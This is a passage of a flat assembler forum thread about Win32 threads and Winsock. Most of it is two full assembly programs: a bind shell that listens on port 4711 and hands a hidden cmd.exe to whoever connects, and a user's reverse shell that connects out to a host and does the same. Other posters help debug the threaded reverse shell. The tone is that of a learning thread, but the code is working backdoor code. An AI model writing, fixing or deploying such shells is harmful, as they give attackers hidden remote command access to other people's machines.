flat assembler
Message board for the users of flat assembler.

Index > Windows > Console Chat Help ;p

Goto page Previous  1, 2
Author
Thread Post new topic Reply to topic
baldr



Joined: 19 Mar 2008
Posts: 1651
baldr 11 Sep 2010, 17:18
Picnic,

WaitForSingleObject() looks like better alternative to Sleep(). It changes behavior from "probably thread's done" to "it's done".

----8<----
Overflowz,

If you want to exit main thread and keep other threads running, use ExitThread() instead of ExitProcess().
Post 11 Sep 2010, 17:18
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz 11 Sep 2010, 18:08
I figured out whats proble. thanks for help everyone! Smile
Post 11 Sep 2010, 18:08
View user's profile Send private message Reply with quote
Picnic



Joined: 05 May 2007
Posts: 1403
Location: Piraeus, Greece
Picnic 14 Sep 2010, 09:41
baldr wrote:
WaitForSingleObject() looks like better alternative to Sleep(). It changes behavior from "probably thread's done" to "it's done".

Absolutely, that was just a stopgap solution. Smile
Post 14 Sep 2010, 09:41
View user's profile Send private message Visit poster's website Reply with quote
jochenvnltn



Joined: 15 Jul 2011
Posts: 96
jochenvnltn 23 Jan 2016, 02:24
Picnic wrote:
You're welcome.

Here is another simple winsock scipt i have on my HD.
It's a shell spawning win32 example written in fasm.

Program will load winsock, listen on a port, and spawn a cmd.exe shell when a connection is made.
Please do not consider this as a virus trojan or something like that.

Code:
    ;-------------------------------------------------------------------------------
    ; - ShellSpawner - Win32 Shell Spawning Example
    ; - Listens on port 4711
    ;-------------------------------------------------------------------------------
    ; - Program will load winsock, listen on a port,
    ;   and spawn a cmd.exe shell when a connection is made
    ;-------------------------------------------------------------------------------
    ; - 30 July 09, Picnic
    ;-------------------------------------------------------------------------------

    format PE CONSOLE

    include "include\win32ax.inc"

;-------------------------------------------------------------------------------

section ".data" data readable writeable

;-------------------------------------------------------------------------------

    IPPROTO_TCP = 6
    INADDR_ANY = 0
    INFINITE = -1
    PORT = 4711

    lpThreadId dd ?
    server dd ?
    saddrlen dd sizeof.sockaddr_in

    align 4
    WSAData WSADATA
    align 4
    lpStartupInfo STARTUPINFO
    align 4
    lpProcessInformation PROCESS_INFORMATION
    align 4
    saddr sockaddr_in

;-------------------------------------------------------------------------------

section ".text" code readable executable

;-------------------------------------------------------------------------------
entry $
    ; initialize the winsock library
    invoke WSAStartup, 0202h, addr WSAData
    test eax, eax
    jnz .exitA

    ; create a new socket
    invoke WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0
    cmp eax, -1
    jz .exitB

    mov dword [server], eax

    ; set address family
    mov word [saddr.sin_family], AF_INET
    ; convert port number to network byte and store it
    invoke htons, PORT
    mov word [saddr.sin_port], ax
    ; let winsock choose my address
    invoke htonl, INADDR_ANY
    mov dword [saddr.sin_addr], eax

    ; assign address to socket
    invoke bind, dword [server], addr saddr, sizeof.sockaddr_in
    test eax, eax
    jnz .exitC

    ; puts socket in listening state
    invoke listen, dword [server], 1
    test eax, eax
    jnz .exitC

    .while 1
       ; loop forever waiting client to arrive.
       ; when a connection is accepted a new socket is created on the server side
        invoke accept, dword [server], addr saddr, addr saddrlen
        cmp eax, -1
        jz .exitC

       ; start a new thread
       ; new socket handle is passed to the thread as parameter
        invoke CreateThread, 0, 0, Thread_ShellSpawner, eax, 0, addr lpThreadId
    .endw

.exitC:
    ; closes server socket
    invoke closesocket, dword [server]
.exitB:
    ; cleans up the winsock library
    invoke WSACleanup
.exitA:
    ; exit application
    invoke ExitProcess, 0
    ret

;-------------------------------------------------------------------------------

align 4
proc Thread_ShellSpawner,\
    client:dword

    local lpBuffer[MAX_PATH+1]:BYTE

    ; retrieves the path of the Windows system directory
    invoke GetSystemDirectory, addr lpBuffer, MAX_PATH
    ; and changes the current directory
    invoke SetCurrentDirectory, addr lpBuffer

    ; specify main window properties
    mov dword [lpStartupInfo.cb], sizeof.STARTUPINFO
    mov dword [lpStartupInfo.lpReserved], 0
    mov dword [lpStartupInfo.lpTitle], 0
    mov dword [lpStartupInfo.dwFlags], STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES
    mov word [lpStartupInfo.wShowWindow], SW_HIDE
    mov word [lpStartupInfo.cbReserved2], 0
    mov dword [lpStartupInfo.lpReserved2], 0
    mov eax, dword [client]
    mov dword [lpStartupInfo.hStdError], eax
    mov dword [lpStartupInfo.hStdInput], eax
    mov dword [lpStartupInfo.hStdOutput], eax

    ; finally, create shell
    invoke CreateProcess, 0, <"cmd.exe">, 0, 0, TRUE, 0, 0, 0, addr lpStartupInfo, addr lpProcessInformation

    ; call WaitForSingleObject with an infinite timeout
    invoke WaitForSingleObject, dword [lpProcessInformation.hProcess], INFINITE

    ; close client socket
    invoke closesocket, dword [client]
    ret
endp

;-------------------------------------------------------------------------------

section ".idata" import data readable writeable

;-------------------------------------------------------------------------------

    library kernel32,"KERNEL32.DLL",\
         ws2_32,"WS2_32.DLL"

    include "include\api\kernel32.inc"

    import ws2_32,\
       WSAStartup,"WSAStartup",\
       WSASocket,"WSASocketA",\
       htonl,"htonl",\
       bind,"bind",\
       htons,"htons",\
       listen,"listen",\
       accept,"accept",\
       closesocket,"closesocket",\
       WSACleanup,"WSACleanup"
    



Hello Picnic

Ive tried to use your example in a reverse shell, but it keeps creating cmd.exe processes. Im still trying to learn about WinSock. Can you point out what's wrong with my code pls ?

Code:
include 'win32ax.inc'
entry main

IPPROTO_TCP = 6
PORT = 8080

    cmd     db "cmd.exe",0
    UrIP    db "localhost",0

    sinfo   STARTUPINFO
    pinfo   PROCESS_INFORMATION

    saddr sockaddr_in
    wsadata WSADATA
    sock dd ?
    lpThreadId dd ?


main:
     invoke WSAStartup, 0202h, wsadata

     test eax,eax
     jnz exit

     invoke WSASocketA, AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0
     cmp eax, -1
     jz exit

     mov [sock],eax
     mov [saddr.sin_family],AF_INET

     invoke htons,PORT
     mov [saddr.sin_port],ax

     invoke gethostbyname, UrIP

     mov eax, [eax+12]
     mov eax, [eax]
     mov eax, [eax]
     mov [saddr.sin_addr], eax
     mov eax,[sock]

    .while 1
     invoke connect, [sock],  saddr , sizeof.sockaddr_in
     invoke CreateThread, 0, 0, Thread_ShellSpawner, eax, 0, addr lpThreadId
    .endw


exit:invoke ExitProcess,0

proc Thread_ShellSpawner,client:dword

     mov dword [sinfo.cb],sizeof.STARTUPINFO
     mov dword [sinfo.dwFlags],STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES
     mov word [sinfo.wShowWindow], SW_HIDE

     mov word [sinfo.cbReserved2], 0
     mov dword [sinfo.lpReserved2], 0

     mov eax,[client]

     mov [sinfo.hStdInput],eax
     mov [sinfo.hStdOutput],eax
     mov [sinfo.hStdError],eax

     invoke CreateProcess, 0, <"cmd.exe">, 0, 0, TRUE, 0, 0, 0,addr sinfo,addr pinfo
     invoke WaitForSingleObject,dword[pinfo.hProcess],-1
     invoke closesocket, dword [client]
     ret
endp

    section '.idata' import data readable writeable
    library kernel32,'kernel32.dll',user32,'user32.dll',ws2_32,'ws2_32.dll'
    include "%include%/api/ws2_32.inc"
    include "%include%/api/kernel32.inc"
    include "%include%/api/user32.inc"
    
Post 23 Jan 2016, 02:24
View user's profile Send private message MSN Messenger Reply with quote
Picnic



Joined: 05 May 2007
Posts: 1403
Location: Piraeus, Greece
Picnic 25 Jan 2016, 10:03
Hi jochenvnltn,

Take it one step at a time, see if you can make the program work without the thread part. Try a simple connect, try different UrIP values, check the return values from function. Use netcat to test the program.

Sorry if i wasn't of much help.
Post 25 Jan 2016, 10:03
View user's profile Send private message Visit poster's website Reply with quote
jochenvnltn



Joined: 15 Jul 2011
Posts: 96
jochenvnltn 25 Jan 2016, 10:34
Picnic wrote:
Hi jochenvnltn,

Take it one step at a time, see if you can make the program work without the thread part. Try a simple connect, try different UrIP values, check the return values from function. Use netcat to test the program.

Sorry if i wasn't of much help.


It works great without the thread part. My question is however why it does not work with the thread part ...
Post 25 Jan 2016, 10:34
View user's profile Send private message MSN Messenger Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20451
Location: In your JS exploiting you and your system
revolution 25 Jan 2016, 11:11
jochenvnltn wrote:
It works great without the thread part. My question is however why it does not work with the thread part ...
I haven't looked at your code closely but using global variables for thread procedures is a good way to have many problems. I'd suggest you make all data used within a thread to use local variables only. If it doesn't help with your problem then at least it will make things a lot easier later on.
Post 25 Jan 2016, 11:11
View user's profile Send private message Visit poster's website Reply with quote
Picnic



Joined: 05 May 2007
Posts: 1403
Location: Piraeus, Greece
Picnic 25 Jan 2016, 11:52
jochenvnltn,

Now i see that in my example a new socket handle is passed to the thread as parameter (created by accept). But connect function is not returning a new socket, maybe there lurks the error.
Post 25 Jan 2016, 11:52
View user's profile Send private message Visit poster's website Reply with quote
jochenvnltn



Joined: 15 Jul 2011
Posts: 96
jochenvnltn 25 Jan 2016, 11:56
revolution wrote:
jochenvnltn wrote:
It works great without the thread part. My question is however why it does not work with the thread part ...
I haven't looked at your code closely but using global variables for thread procedures is a good way to have many problems. I'd suggest you make all data used within a thread to use local variables only. If it doesn't help with your problem then at least it will make things a lot easier later on.


Thx for the tip. I did not know that Smile The problem here is that the global variables are not used in the thread, so it can't be part of the problem here.
Post 25 Jan 2016, 11:56
View user's profile Send private message MSN Messenger Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20451
Location: In your JS exploiting you and your system
revolution 25 Jan 2016, 11:59
sinfo is global and used within the thread, no? pinfo also, no?
Post 25 Jan 2016, 11:59
View user's profile Send private message Visit poster's website Reply with quote
jochenvnltn



Joined: 15 Jul 2011
Posts: 96
jochenvnltn 25 Jan 2016, 12:03
revolution wrote:
sinfo is global and used within the thread, no? pinfo also, no?


Ha.. Okay sorry about that.. Your right Smile Ill do some more reading about the subject. thx for the reply.
Post 25 Jan 2016, 12:03
View user's profile Send private message MSN Messenger Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20451
Location: In your JS exploiting you and your system
revolution 25 Jan 2016, 12:12
BTW: Whenever you create a thread you should also close the thread handle (with CloseHandle) at some point, else you get handle and memory leakage problems. If you don't need the exit code then you can close the handle immediately and just let the thread do its things and close itself when done.

Note: Closing the handle does not close the thread so don't worry about it being prematurely terminated.
Post 25 Jan 2016, 12:12
View user's profile Send private message Visit poster's website Reply with quote
jochenvnltn



Joined: 15 Jul 2011
Posts: 96
jochenvnltn 25 Jan 2016, 12:15
revolution wrote:
BTW: Whenever you create a thread you should also close the thread handle (with CloseHandle) at some point, else you get handle and memory leakage problems. If you don't need the exit code then you can close the handle immediately and just let the thread do its things and close itself when done.

Note: Closing the handle does not close the thread so don't worry about it being prematurely terminated.


Okay revolution thank you ill get testing with this. Im also learning at the same time, so thank you for the tip Wink
Post 25 Jan 2016, 12:15
View user's profile Send private message MSN Messenger Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  
Goto page Previous  1, 2

< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.

Website powered by rwasa.